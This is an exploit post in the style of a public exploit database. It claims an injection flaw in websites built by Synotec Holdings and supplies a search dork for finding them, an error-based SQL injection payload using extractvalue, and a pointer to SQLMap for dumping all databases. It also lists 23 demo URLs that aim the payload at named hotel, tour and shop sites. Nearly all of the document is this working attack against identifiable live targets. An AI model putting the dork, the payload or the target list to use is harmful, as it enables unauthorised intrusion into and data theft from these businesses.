# Exploit Title: WEB SITE BY Synotec Holdings Xpath Injection Vulnerability
# Dork: "WEB SITE BY: Synotec Holdings (Pvt) Ltd."
# Date: 2020-09-26
# Exploit Author: Behrouz Mansoori
# Vendor Homepage: https://www.synotec.lk
# Category: Webapps
# Tested on: Windows 10
=======================================
[+]Proof Of Concept:
[+]Exploit:
' and extractvalue(rand(),concat(0x7e,version()))--+
*You can use SQLMap or manually using the Xpath Injection technique to retrieve all databases~
[+]Demo 1:
https://coralsandshotel.com/view_activities.php?id=8%27%20and%20extractvalue(rand(),concat(0x7e,version()))--+
[+]Demo 2:
https://samara.lk/view-product.php?id=46%20and%20extractvalue(rand(),concat(0x7e,version()))--
[+]Demo 3:
https://www.applevacations.com.co/view-city.php?id=11%20and%20/*!12345extractvalue(rand(),CONCAT(0x7e,version()))*/--
[+]Demo 4:
http://www.unawatunadive.com/view-dive-courses.php?id=1%27%20and%20/*!12345extractvalue(rand(),CONCAT(0x7e,version()))*/--+
[+]Demo 5:
https://www.srilanka-round-tours.com/tour-packages.php?id=6%20and%20extractvalue(rand(),concat(0x7e,version()))--
[+]Demo 6:
https://visionlankatours.com/view-one-day-tour-package.php?id=2%20and%20/*!12345extractvalue(rand(),CONCAT(0x7e,version()))*/--
[+]Demo 7:
https://tamarindholiday.com/view-tour-package.php?id=11%20and%20extractvalue(rand(),concat(0x7e,version()))--
[+]Demo 8:
http://agpholdings.lk/product.php?id=1%20and%20extractvalue(rand(),concat(0x7e,version()))--
[+]Demo 9:
http://riverstonehotels.com/view-places.php?id=8%27%20and%20extractvalue(rand(),concat(0x7e,version()))--+
[+]Demo 10:
http://srilankalasatours.com/view-tour.php?id=1%20and%20extractvalue(rand(),concat(0x7e,version()))--
[+]Demo 11:
http://www.thehorizonvilla.com/view-room.php?id=9%27%20and%20/*!12345extractvalue(rand(),CONCAT(0x7e,version()))*/--+
[+]Demo 12:
http://hiriketiyabeach.lk/room-view.php?id=1%20and%20extractvalue(rand(),concat(0x7e,version()))--
[+]Demo 13:
https://www.srilankaparadisetours.com/view-package.php?id=2%27%20and%20extractvalue(rand(),concat(0x7e,version()))--+
[+]Demo 14:
http://www.shinyweddinghalls.shiny.lk/gallery.php?h=1%27%20and%20extractvalue(rand(),concat(0x7e,version()))--+
[+]Demo 15:
https://www.mirissawhalewarriors.com/view-service.php?id=1%27%20and%20extractvalue(rand(),concat(0x7e,version()))--+
[+]Demo 16:
http://horizon-villa.com/view-facilities.php?id=39%20and%20/*!12345extractvalue(rand(),CONCAT(0x7e,version()))*/--
[+]Demo 17:
http://www.newberlintours.lk/view-excursions.php?id=6%27%20and%20extractvalue(rand(),concat(0x7e,version()))--+
[+]Demo 18:
http://gimlk.com/products.php?id=14%20and%20extractvalue(rand(),concat(0x7e,version()))--
[+]Demo 19:
https://susanthadriversrilanka.com/view-day-tour.php?id=1%20and%20extractvalue(rand(),concat(0x7e,version()))--
[+]Demo 20:
http://www.srilankasmarttours.com/booking-form.php?id=1%27%20and%20extractvalue(rand(),concat(0x7e,version()))--+
[+]Demo 21:
http://srilankantimetraveller.com/view-package.php?id=32%27%20and%20extractvalue(rand(),concat(0x7e,version()))--+
[+]Demo 22:
http://okithmatours.com/view-attractions.php?id=5%20and%20extractvalue(rand(),concat(0x7e,version()))--
[+]Demo 23:
http://www.touroflanka.com/view-tour.php?id=4%27%20and%20extractvalue(rand(),concat(0x7e,version()))--+
#########################################################
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: mr.mansoori@yahoo.com
#########################################################